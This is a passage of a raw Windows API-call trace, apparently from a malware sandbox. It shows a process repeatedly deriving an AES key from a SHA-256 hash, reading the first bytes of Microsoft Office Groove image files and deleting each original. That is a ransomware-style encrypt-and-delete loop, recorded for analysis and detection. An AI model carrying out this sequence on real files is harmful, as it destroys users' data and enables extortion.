CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.597] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\calendartooliconimagesmask.bmp")) returned 1 [0162.598] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.599] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.599] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.599] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.599] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf38 [0162.599] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.619] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.619] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.619] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImages.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\chessiconimages.bmp")) returned 1 [0162.621] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.622] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.622] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.622] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.622] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x938 [0162.622] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.642] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.642] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.642] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.643] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\chessiconimagesmask.bmp")) returned 1 [0162.645] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.645] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.645] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.645] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.645] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x296b [0162.646] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.667] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.667] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.667] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\createspaceimage.jpg")) returned 1 [0162.670] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.671] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.671] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.671] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.671] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf78 [0162.671] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.732] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.732] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.732] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\createspaceimagemask.bmp")) returned 1 [0162.736] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.736] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.736] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.736] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.736] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16c7 [0162.736] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.754] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.754] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.754] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\datalisticonimages.jpg")) returned 1 [0162.756] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.757] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.757] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.757] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.757] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x708 [0162.757] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.765] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.765] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.766] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.767] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\datalisticonimagesmask.bmp")) returned 1 [0162.772] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.773] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.773] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.773] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.773] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16c7 [0162.773] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.788] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.788] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.788] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.789] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimages.jpg")) returned 1 [0162.791] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.791] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.791] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.791] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.791] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x708 [0162.791] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.819] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.819] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.819] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.820] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimagesmask.bmp")) returned 1 [0162.822] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.822] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.822] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.822] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.822] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2eaf [0162.822] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.830] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.830] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.830] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.831] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimages.jpg")) returned 1 [0162.833] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.833] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.833] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.833] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.833] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0162.833] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.846] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.846] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.846] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimagesmask.bmp")) returned 1 [0162.851] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.852] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.852] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.852] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.852] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a0f [0162.852] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.863] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.863] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.863] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.864] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimage.jpg")) returned 1 [0162.865] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.866] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.866] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.866] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.866] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3618 [0162.866] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.879] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.879] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.879] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimagemask.bmp")) returned 1 [0162.882] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.883] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.883] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.883] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.883] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe5 [0162.883] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.893] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.893] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.893] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.894] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationicon.jpg")) returned 1 [0162.895] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.896] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.896] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.896] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.896] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0162.896] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.898] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.898] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.898] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.899] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationiconmask.bmp")) returned 1 [0162.900] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.901] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.901] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.901] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.901] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xceed [0162.901] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.922] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.922] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.922] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.924] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg")) returned 1 [0162.926] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.927] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.927] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.927] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.927] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e93 [0162.927] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.942] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.942] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.942] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.944] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24images.jpg")) returned 1 [0162.945] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.945] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.945] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.945] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.946] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaf8 [0162.946] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.959] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.959] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.959] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.960] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24imagesmask.bmp")) returned 1 [0162.961] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.962] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.962] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.962] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.962] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x25e5 [0162.962] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.992] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.992] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.993] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimages.jpg")) returned 1 [0163.016] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, 